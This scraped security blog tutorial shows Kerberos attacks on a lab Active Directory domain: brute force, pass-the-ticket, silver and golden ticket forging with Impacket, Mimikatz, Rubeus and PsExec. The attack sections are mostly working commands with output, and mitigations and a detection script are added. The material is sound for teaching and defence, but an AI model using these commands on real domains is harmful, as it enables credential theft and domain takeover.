PS C:\\Users\\velociraptor&gt; klist    Current LogonId is 0:0x34f9571    Cached Tickets: (1)    #0&gt;     Client: trex @ JURASSIC.PARK          Server: krbtgt\/JURASSIC.PARK @ JURASSIC.PARK          KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 3\/5\/2019 9:15:59 (local)          End Time:   3\/5\/2019 19:15:59 (local)          Renew Time: 3\/7\/2019 12:14:43 (local)          Session Key Type: AES-256-CTS-HMAC-SHA1-96    PS C:\\Users\\velociraptor&gt; .\\PsExec.exe -accepteula \\\\lab-wdc01.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation.  All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\trex    C:\\Windows\\system32&gt;    Rubeus example:  C:\\Users\\velociraptor&gt;.\\Rubeus.exe ptt \/ticket:-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    
C:\\Users\\velociraptor&gt;klist    Current LogonId is 0:0x34f958e    Cached Tickets: (1)    #0&gt;     Client: trex @ JURASSIC.PARK          Server: krbtgt\/JURASSIC.PARK @ JURASSIC.PARK          KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 3\/5\/2019 9:15:59 (local)          End Time:   3\/5\/2019 19:15:59 (local)          Renew Time: 3\/7\/2019 12:14:43 (local)          Session Key Type: AES-256-CTS-HMAC-SHA1-96      C:\\Users\\velociraptor&gt;.\\PsExec.exe -accepteula \\\\lab-wdc01.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation.  All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\trex    C:\\Windows\\system32&gt;    After injecting the ticket of a user account, it is possible to act on behalf of that user in remote machines, but not in the local one, where Kerberos doesn't apply. Remember that TGT tickets are more useful than TGS ones, as they are not restricted to one service only.      Silver ticket  The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.    In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.    It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256), which are calculated from the password as well, and can be used by Impacket and Mimikatz to craft the tickets. Moreover, these keys, unlike the NTLM hash, are salted with the domain and username. 
In order to know more about how these keys are calculated, it is recommended to read section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1 script.  From Linux  As usual, it is possible to perform these attacks from a Linux machine by using the examples provided by impacket. In this case ticketer.py is used to forge a TGS:  root@kali:impacket-examples# python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs\/labwws02.jurassic.park  stegosaurus  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Creating basic skeleton ticket and PAC Infos   Customizing ticket for jurassic.park\/stegosaurus   \tPAC_LOGON_INFO   \tPAC_CLIENT_INFO_TYPE   \tEncTicketPart   \tEncTGSRepPart   Signing\/Encrypting final ticket   \tPAC_SERVER_CHECKSUM   \tPAC_PRIVSVR_CHECKSUM   \tEncTicketPart   \tEncTGSRepPart   Saving ticket in stegosaurus.ccache  root@kali:impacket-examples# export KRB5CCNAME=\/root\/impacket-examples\/stegosaurus.ccache   root@kali:impacket-examples# python psexec.py jurassic.park\/stegosaurus@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file JhRQHMnu.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service Drvl on labwws02.jurassic.park.....   Starting service Drvl.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the -no-pass -k parameters in any of the impacket examples.  From Windows  In Windows, Mimikatz can be used to craft the ticket. 
Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec. It must be taken into account that tickets can be forged on a local machine that is not in the target network and then sent to a machine in the network to be injected. An execution example is shown below:  C:\\Users\\triceratops&gt;.\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::golden \/domain:jurassic.park \/sid:S-1-5-21-1339291983-1349129144-367733775 \/rc4:b18b4b218eccad1c223306ea1916885f \/user:stegosaurus \/service:cifs \/target:labwws02.jurassic.park  User      : stegosaurus  Domain    : jurassic.park (JURASSIC)  SID       : S-1-5-21-1339291983-1349129144-367733775  User Id   : 500  Groups Id : *513 512 520 518 519  ServiceKey: b18b4b218eccad1c223306ea1916885f - rc4_hmac_nt  Service   : cifs  Target    : labwws02.jurassic.park  Lifetime  : 28\/02\/2019 13:42:05 ; 25\/02\/2029 13:42:05 ; 25\/02\/2029 13:42:05  -&gt; Ticket : ticket.kirbi     * PAC generated   * PAC signed   * EncTicketPart generated   * EncTicketPart encrypted   * KrbCred generated    Final Ticket Saved to file !    mimikatz # exit  Bye!  C:\\Users\\triceratops&gt;.\\Rubeus.exe ptt \/ticket:ticket.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    
C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\labwws02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\stegosaurus    C:\\Windows\\system32&gt;    Additionally, the Mimikatz module kerberos::ptt can be used to inject the ticket instead of Rubeus, as shown in the PTT attack section.      Golden ticket  The Golden ticket technique is similar to the Silver ticket one. However, in this case a TGT is crafted by using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of a TGS is being able to access any service (or machine) in the domain.    The krbtgt account NTLM hash can be obtained from the lsass process or the NTDS.dit file of any DC in the domain. It is also possible to get that NTLM hash through a DCsync attack, which can be performed either with the lsadump::dcsync module of Mimikatz or the impacket example secretsdump.py. Usually, domain admin privileges or similar are required, no matter what technique is used.  From Linux  The way to forge a Golden Ticket is very similar to the Silver Ticket one. 
The main differences are that, in this case, no service SPN is specified to ticketer.py, and the krbtgt NTLM hash must be used:  root@kali:impacket-examples# python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Creating basic skeleton ticket and PAC Infos   Customizing ticket for jurassic.park\/stegosaurus   \tPAC_LOGON_INFO   \tPAC_CLIENT_INFO_TYPE   \tEncTicketPart   \tEncAsRepPart   Signing\/Encrypting final ticket   \tPAC_SERVER_CHECKSUM   \tPAC_PRIVSVR_CHECKSUM   \tEncTicketPart   \tEncASRepPart   Saving ticket in stegosaurus.ccache  root@kali:impacket-examples# export KRB5CCNAME=\/root\/impacket-examples\/stegosaurus.ccache  root@kali:impacket-examples# python psexec.py jurassic.park\/stegosaurus@lab-wdc02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on lab-wdc02.jurassic.park.....   Found writable share ADMIN$   Uploading file goPntOCB.exe   Opening SVCManager on lab-wdc02.jurassic.park.....   Creating service DMmI on lab-wdc02.jurassic.park.....   Starting service DMmI.....   Press help for extra shell commands  Microsoft Windows   (c) 2013 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    The result is similar to the Silver Ticket one, but this time the compromised server is the DC, and it could be any machine of the domain.  From Windows  As in the Silver ticket case, Mimikatz, Rubeus and PsExec can be used to launch the attack:  C:\\Users\\triceratops&gt;.\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  
\"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::golden \/domain:jurassic.park \/sid:S-1-5-21-1339291983-1349129144-367733775 \/rc4:25b2076cda3bfd6209161a6c78a69c1c \/user:stegosaurus  User      : stegosaurus  Domain    : jurassic.park (JURASSIC)  SID       : S-1-5-21-1339291983-1349129144-367733775  User Id   : 500  Groups Id : *513 512 520 518 519  ServiceKey: 25b2076cda3bfd6209161a6c78a69c1c - rc4_hmac_nt  Lifetime  : 28\/02\/2019 10:58:03 ; 25\/02\/2029 10:58:03 ; 25\/02\/2029 10:58:03  -&gt; Ticket : ticket.kirbi     * PAC generated   * PAC signed   * EncTicketPart generated   * EncTicketPart encrypted   * KrbCred generated    Final Ticket Saved to file !    mimikatz # exit  Bye!  C:\\Users\\triceratops&gt;.\\Rubeus.exe ptt \/ticket:ticket.kirbi       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3       Action: Import Ticket   Ticket successfully imported!    
C:\\Users\\triceratops&gt;klist    Current LogonId is 0:0x50ca688    Cached Tickets: (1)    #0&gt;     Client: stegosaurus @ jurassic.park          Server: krbtgt\/jurassic.park @ jurassic.park          KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)          Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent          Start Time: 2\/28\/2019 11:36:55 (local)          End Time:   2\/25\/2029 11:36:55 (local)          Renew Time: 2\/25\/2029 11:36:55 (local)          Session Key Type: RSADSI RC4-HMAC(NT)          Cache Flags: 0x1 -&gt; PRIMARY          Kdc Called:    C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\lab-wdc02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   (c) 2013 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\stegosaurus    C:\\Windows\\system32&gt;    While I was performing this technique, it sometimes seemed that the tickets didn't work. I was wondering what was happening when I remembered reading this post about the 20 minute rule for PAC validation in the DC. Then I realized that all of the failed tickets had been injected after I had been performing some unrelated tasks, which means that between the moment I created the ticket and the moment I injected it, at least half an hour had passed. So, remember to inject the tickets after creating them.      Mitigations  In order to prevent or mitigate many of these Kerberos attacks, a series of policies can be implemented. Some examples are the following:     \tEnable a strong password policy: The first step is to avoid weak passwords in domain user accounts. To achieve this, a strong password policy should be implemented by ensuring that the complex password option is enabled on the Active Directory domain. Moreover, blacklist common predictable terms in passwords, such as company names, years or month names.   
\tAvoid accounts without pre-authentication: Unless it is strictly necessary, no account should have Kerberos pre-authentication disabled. If this cannot be avoided, take note of these special accounts and give them pseudo-random passwords with a high level of complexity.   \tAvoid executing services on behalf of user accounts: Avoid services that run in a domain user account context. If a special user account is used to launch domain services, generate a strong pseudo-random password for that account.   \tVerify PAC: Enable PAC verification in order to avoid attacks such as Silver Ticket. To enable this check, set the value ValidateKdcPacSignature (DWORD) in subkey HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos\\Parameters to 1.   \tChange passwords periodically: Set policies to ensure that user passwords are periodically modified, for example, every 2 to 4 months. As a special case, the krbtgt account password should also be changed periodically, since that key is used to create TGTs. For this purpose, the script https:\/\/gallery.technet.microsoft.com\/Reset-the-krbtgt-account-581a9e51 can be used. Note that the krbtgt password must be modified twice to invalidate current domain tickets, for cache reasons. Another consideration is that the functional level of the domain must be equal to or higher than Windows Server 2008 in order to manipulate the krbtgt account credentials.   \tDisable Kerberos weak encryption types: Only Kerberos encryption with AES keys should be allowed. Furthermore, Kerberos requests with a lower level of encryption, such as RC4, should be monitored, since it is usually used by attack tools.    Additionally, Microsoft has published a guide which explains in more detail how to prevent and mitigate this sort of attack. It can be downloaded at https:\/\/www.microsoft.com\/en-us\/download\/details.aspx?id=36036.      
Conclusion  As has already been shown, Kerberos has an enormous attack surface that attackers can use. Therefore, it is necessary to be aware of these attack techniques in order to deploy a set of security policies that avoid and mitigate them.    However, the journey is not over yet. So far, only direct attacks have been covered, and there is a Kerberos feature that expands this surface: Delegation.    Therefore, the next post of this series will try to explain this feature and how it can be abused to steal and compromise domain accounts.      References     \tMS-KILE: https:\/\/docs.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-kile\/2a32282e-dd48-4ad9-a542-609804b02cc9   \tImpacket: https:\/\/github.com\/SecureAuthCorp\/impacket   \tMimikatz: https:\/\/github.com\/gentilkiwi\/mimikatz   \tRubeus: https:\/\/github.com\/GhostPack\/Rubeus   \tInvoke-Kerberoast: https:\/\/github.com\/EmpireProject\/Empire\/blob\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1   \tKerbrute.py: https:\/\/github.com\/TarlogicSecurity\/kerbrute   \tticket_converter.py: https:\/\/github.com\/Zer1t0\/ticket_converter   \tTickey: https:\/\/github.com\/TarlogicSecurity\/tickey   \tKerberos Credential Thievery (GNU\/Linux): https:\/\/www.delaat.net\/rp\/2016-2017\/p97\/report.pdf   \tFun with LDAP and Kerberos in AD environments: https:\/\/speakerdeck.com\/ropnop\/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=79   \t20 Minute Rule PAC: https:\/\/passing-the-hash.blogspot.com.es\/2014\/09\/pac-validation-20-minute-rule-and.html   \tMimikatz and your credentials: https:\/\/www.nosuchcon.org\/talks\/2014\/D2_02_Benjamin_Delpy_Mimikatz.pdf   \tMIT Kerberos Credential cache types: https:\/\/web.mit.edu\/kerberos\/krb5-devel\/doc\/basic\/ccache_def.html   \tMIT Kerberos File ccache format: https:\/\/web.mit.edu\/kerberos\/krb5-devel\/doc\/formats\/ccache_file_format.html   \tDetecting Kerberoasting: https:\/\/adsecurity.org\/?p=3458    
Discover our work and\u00a0cybersecurity services\u00a0at\u00a0www.tarlogic.com    In\u00a0TarlogicTeo\u00a0and\u00a0TarlogicMadrid.    ","keywords":"hacking, How to attack Kerberos, Kerberos, kerberos attack, ","datePublished":"2019-06-04T11:26:55+02:00","dateModified":"2021-12-20T00:28:33+01:00","author":{"@type":"Person","name":"Eloy P\u00e9rez","description":"","url":"https:\/\/www.tarlogic.com\/blog\/author\/eloy-pereztarlogic-com\/","sameAs":[],"image":{"@type":"ImageObject","url":"https:\/\/secure.gravatar.com\/avatar\/aef78b0d8eb6bff91accf3fb03a9934b?s=96&d=mm&r=g","height":96,"width":96}},"editor":{"@type":"Person","name":"Eloy P\u00e9rez","description":"","url":"https:\/\/www.tarlogic.com\/blog\/author\/eloy-pereztarlogic-com\/","sameAs":[],"image":{"@type":"ImageObject","url":"https:\/\/secure.gravatar.com\/avatar\/aef78b0d8eb6bff91accf3fb03a9934b?s=96&d=mm&r=g","height":96,"width":96}},"publisher":{"@type":"Organization","name":"Tarlogic Security \u2013 Cyber Security and Ethical hacking","url":"https:\/\/www.tarlogic.com","logo":{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2016\/12\/LOGOTIPO_TARLOGIC_WEB.png","width":"239","height":"60"}},"comment":[{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-51525","dateCreated":"2020-03-12T04:34:22+01:00","description":"Excellent article! Great job of organizing all this data in an easy to read format!","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Jorko: Wonderchimp","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-31239","dateCreated":"2020-02-12T17:19:01+01:00","description":"Thanks for sharing  Active directory auditor tips.  
for more info i rfer cion systems  Active directory auditor in USA.","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"cionsystems","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23707","dateCreated":"2019-06-07T08:28:08+02:00","description":"Hi, thats an excellent question because that command could be a little confusing, however it is not a mistake. Mimikatz uses the same command (kerberos::golden) to generate silver and golden tickets. It generates an TGS or TGT based on the arguments provided, more specifically, if you provide the service parameter, then a TGS will be generated. There is more information in https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\/module-~-kerberos#golden--silver.","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Eloy P\u00e9rez","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23704","dateCreated":"2019-06-07T05:12:31+02:00","description":"HiIt looks like the Mimikatz for Windows for Siverticket was accidentally replace with the Golden ticket procedure. Is that right? Or am I missing something?","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Jesse","url":""}},{"@type":"Comment","id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/comment-23651","dateCreated":"2019-06-04T16:29:02+02:00","description":"great reading!!!!!!! 
thank you for sharing!","upvoteCount":0,"downvoteCount":0,"author":{"@type":"Person","name":"Smokey","url":""}}],"image":[{"@type":"ImageObject","@id":"https:\/\/www.tarlogic.com\/blog\/how-to-attack-kerberos\/#primaryimage","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x708.png","width":"1200","height":"708"},{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x900.png","width":"1200","height":"900"},{"@type":"ImageObject","url":"https:\/\/www.tarlogic.com\/wp-content\/uploads\/2019\/06\/kerberosII-1200x675.png","width":"1200","height":"675"}]}]
</script>
</head>
<body class="post-template-default single single-post postid-19268 single-format-standard fusion-image-hovers fusion-pagination-sizing fusion-button_size-large fusion-button_type-flat fusion-button_span-no avada-image-rollover-circle-yes avada-image-rollover-yes avada-image-rollover-direction-left fusion-body ltr fusion-sticky-header no-mobile-slidingbar fusion-disable-outline fusion-sub-menu-fade mobile-logo-pos-left layout-wide-mode avada-has-boxed-modal-shadow-none layout-scroll-offset-full avada-has-zero-margin-offset-top fusion-top-header menu-text-align-center mobile-menu-design-modern fusion-show-pagination-text fusion-header-layout-v3 avada-responsive avada-footer-fx-none avada-menu-highlight-style-bar fusion-search-form-classic fusion-main-menu-search-dropdown fusion-avatar-square avada-sticky-shrinkage avada-blog-layout-grid avada-blog-archive-layout-grid avada-header-shadow-no avada-menu-icon-position-left avada-has-megamenu-shadow avada-has-mainmenu-dropdown-divider avada-has-breadcrumb-mobile-hidden avada-has-titlebar-bar_and_content avada-has-pagination-padding avada-flyout-menu-direction-fade avada-ec-views-v1">
<main role="main">
<section class="section single_post">
<article>
<header class="single_post__header">
<div class="single_post__content">
<h1 class="single_post__title">Kerberos (II): How to attack Kerberos?</h1>
<span class="single_post__entry_date__author">
<time datetime="2019-06-04">04 - Jun - 2019</time>
- Eloy Pérez
</span>
</div>
</header>
<div class="single_post__content">
<h3>Introduction</h3>
<div>
<div>In this article about Kerberos, a few attacks against the protocol will be shown. In order to refresh the concepts behind the following attacks, it is recommended to check the first part of this series which covers <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</div>
</div>
<div></div>
<div>
<div>
<div>The post is divided into one section per attack:</div>
<ul>
<li>Kerberos brute-force</li>
<li>ASREPRoast</li>
<li>Kerberoasting</li>
<li>Pass the key</li>
<li>Pass the ticket</li>
<li>Silver ticket</li>
<li>Golden ticket</li>
</ul>
</div>
<div>
<div>These attacks are sorted by the privileges needed to perform them, in ascending order. Thus, the first attacks require only connectivity with the DC (Domain Controller), which is the KDC (Key Distribution Center) for the AD (Active Directory) network, whereas the last attack requires a user who is a Domain Administrator or has similar privileges.</div>
<div></div>
</div>
<div>
<div>
<div>Furthermore, each attack will be introduced from the pentesting perspective of 2 common scenarios:</div>
<div>
<div>
<ul>
<li><strong>Linux machine</strong>: A computer external to the domain, owned by the auditor (Kali in this case), but with network connectivity to the DC (directly, VPN, Socks, does not really matter). It must be taken into account that the local time of the machine has to be synchronized with the DC.</li>
<li><strong>Windows machine</strong>: A compromised Windows machine in the domain, with a domain account if needed but with no administrator privileges, neither local nor domain.</li>
</ul>
<div>It is done this way because there are plenty of publications that cover only part of one scenario. Therefore, the goal here is to present a useful guide that shows how to perform each attack in many different circumstances. In any case, anyone can leave a comment if a concept is not completely explained.</div>
</div>
</div>
</div>
</div>
</div>
<h3>Tools</h3>
<div>First of all, throughout this article the following main tools are used:</div>
<ul>
<li>The examples of <a href="https://github.com/SecureAuthCorp/impacket" rel="nofollow">Impacket</a>, to perform Kerberos-related attacks from Linux; they require Python installed on the machine.</li>
<li><a href="https://github.com/gentilkiwi/mimikatz" rel="nofollow">Mimikatz</a>, for Windows attacks.</li>
<li><a href="https://github.com/GhostPack/Rubeus" rel="nofollow">Rubeus</a>, for Windows attacks, which requires Redistributable 3.5 installed on the machine.</li>
<li><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec" rel="nofollow">PsExec</a>, for executing commands from Windows in remote machines.</li>
</ul>
<div>There are a few additional tools, but those will be introduced in their respective sections. Besides, a <a href="https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a">Kerberos attacks cheatsheet</a> was created to quickly get the commands needed to perform any of these attacks.</div>
<div></div>
<div>Let&#8217;s go with the interesting stuff.</div>
<div>
<h3>Kerberos brute-force</h3>
<div>First of all, since Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has several advantages over brute-forcing other authentication methods:</div>
<ul>
<li>No domain account is needed to conduct the attack, just connectivity to the KDC.</li>
<li>Kerberos pre-authentication errors are not logged in Active Directory as a normal logon failure event (4625), but as a specific Kerberos pre-authentication failure event (4771).</li>
<li>Kerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage in case of performing this sort of technique without knowing any username.</li>
<li>In Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.</li>
</ul>
<div>However, by carrying out a brute-force attack it is also possible to <strong>block user accounts</strong>. Thus, this technique should be used carefully.</div>
</div>
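<p>Because these failures are recorded as event 4771 rather than 4625, monitoring has to read the Kerberos events on the DC. The following detector is an added example, not part of the original article or of any tool it uses: it counts 4771 failures with status 0x18 (wrong password) and failed 4768 requests with status 0x6 (unknown username) per source address. The field names follow the EventData of those two events; the sample events, IP addresses and thresholds are constructed assumptions.</p>

```python
"""Flag Kerberos password guessing from domain controller security events."""
from collections import defaultdict
from datetime import datetime, timedelta

BAD_PASSWORD = "0x18"      # KDC_ERR_PREAUTH_FAILED, the Status of event 4771
UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN, the Status of a failed 4768


def _ev(ts, event_id, user, ip, status):
    """Build one event record using the EventData field names of 4768/4771."""
    return {"TimeCreated": ts, "EventID": event_id, "TargetUserName": user,
            "IpAddress": ip, "Status": status}


# Constructed sample events (not taken from the article's lab).
NOISY = "::ffff:10.200.220.77"
QUIET = "::ffff:10.200.220.90"
SAMPLE_EVENTS = (
    [_ev(f"2019-03-05T10:00:{10 + i:02d}", 4768, name, NOISY, UNKNOWN_PRINCIPAL)
     for i, name in enumerate(["stegosaurus", "diplodocus", "pterodactyl"])]
    + [_ev(f"2019-03-05T10:01:{i:02d}", 4771, "trex", NOISY, BAD_PASSWORD)
       for i in range(5)]
    + [_ev("2019-03-05T10:01:30", 4771, "triceratops", NOISY, BAD_PASSWORD),
       _ev("2019-03-05T10:01:40", 4771, "velociraptor", NOISY, BAD_PASSWORD),
       # One user mistyping a password twice, an hour apart: below every threshold.
       _ev("2019-03-05T09:00:00", 4771, "triceratops", QUIET, BAD_PASSWORD),
       _ev("2019-03-05T10:00:00", 4771, "triceratops", QUIET, BAD_PASSWORD),
       # A successful TGT request (Status 0x0) is ignored by the detector.
       _ev("2019-03-05T10:02:00", 4768, "triceratops", QUIET, "0x0")]
)


def detect(events, window=timedelta(minutes=5), spray_users=3,
           guesses_per_user=5, unknown_users=3):
    """Return sorted (source_ip, finding) pairs for sources that cross a threshold."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4771 and ev["Status"] == BAD_PASSWORD:
            kind = "bad_password"
        elif ev["EventID"] == 4768 and ev["Status"] == UNKNOWN_PRINCIPAL:
            kind = "unknown_user"
        else:
            continue  # successes and other failure codes are out of scope here
        ip = ev["IpAddress"]
        if ip.startswith("::ffff:"):  # DCs log IPv4 clients as IPv4-mapped IPv6
            ip = ip[len("::ffff:"):]
        when = datetime.fromisoformat(ev["TimeCreated"])
        by_ip[ip].append((when, kind, ev["TargetUserName"].lower()))

    findings = set()
    for ip, rows in by_ip.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the window so it only holds events within `window` of rows[end].
            while rows[end][0] - rows[start][0] > window:
                start += 1
            failures, unknown = defaultdict(int), set()
            for _, kind, user in rows[start:end + 1]:
                if kind == "bad_password":
                    failures[user] += 1
                else:
                    unknown.add(user)
            if len(failures) >= spray_users:
                findings.add((ip, "password_spray"))
            if max(failures.values(), default=0) >= guesses_per_user:
                findings.add((ip, "single_account_guessing"))
            if len(unknown) >= unknown_users:
                findings.add((ip, "username_enumeration"))
    return sorted(findings)


if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_EVENTS):
        print(f"{ip}: {finding}")
```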
<h4>From Linux</h4>
<p>The script <a href="https://github.com/TarlogicSecurity/kerbrute">kerbrute.py</a> can be used to perform a brute-force attack by using Kerberos from a Linux computer:</p>
<pre><code class="language-shell">root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Valid user =&gt; triceratops
[*] Valid user =&gt; velociraptor [NOT PREAUTH]
[*] Valid user =&gt; trex
[*] Blocked/Disabled user =&gt; trex
[*] Stupendous =&gt; velociraptor:Sm4rtSp33d
[*] Saved TGT in velociraptor.ccache
[*] Saved discovered passwords in jurassic_passwords.txt
</code></pre>
<p>Once finished, a file with the discovered passwords is generated. In addition, the obtained TGTs are stored for future use.</p>
<h4>From Windows</h4>
<p>On Windows, the <em>brute</em> module of <a href="https://github.com/Zer1t0/Rubeus" rel="nofollow">Rubeus</a>, which is available in the fork by <a href="https://github.com/Zer1t0/Rubeus" rel="nofollow">Zer1t0</a>, can be used to launch a brute-force attack like the following:</p>
<pre><code class="language-shell">PS C:\Users\user01&gt; .\Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:jurassic.park /outfile:jurassic_passwords.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2

[+] Valid user =&gt; velociraptor
[+] Valid user =&gt; trex
[+] Valid user =&gt; triceratops
[+] STUPENDOUS =&gt; triceratops:Sh4rpH0rns
[*] Saved TGT into triceratops.kirbi
</code></pre>
<p>In the same way as in the Linux scenario, the discovered credentials are saved in the output file alongside valid TGTs.</p>
<h3>ASREPRoast</h3>
<p>The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</p>
<p>Furthermore, no domain account is needed to perform this attack, only connection to the KDC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.</p>
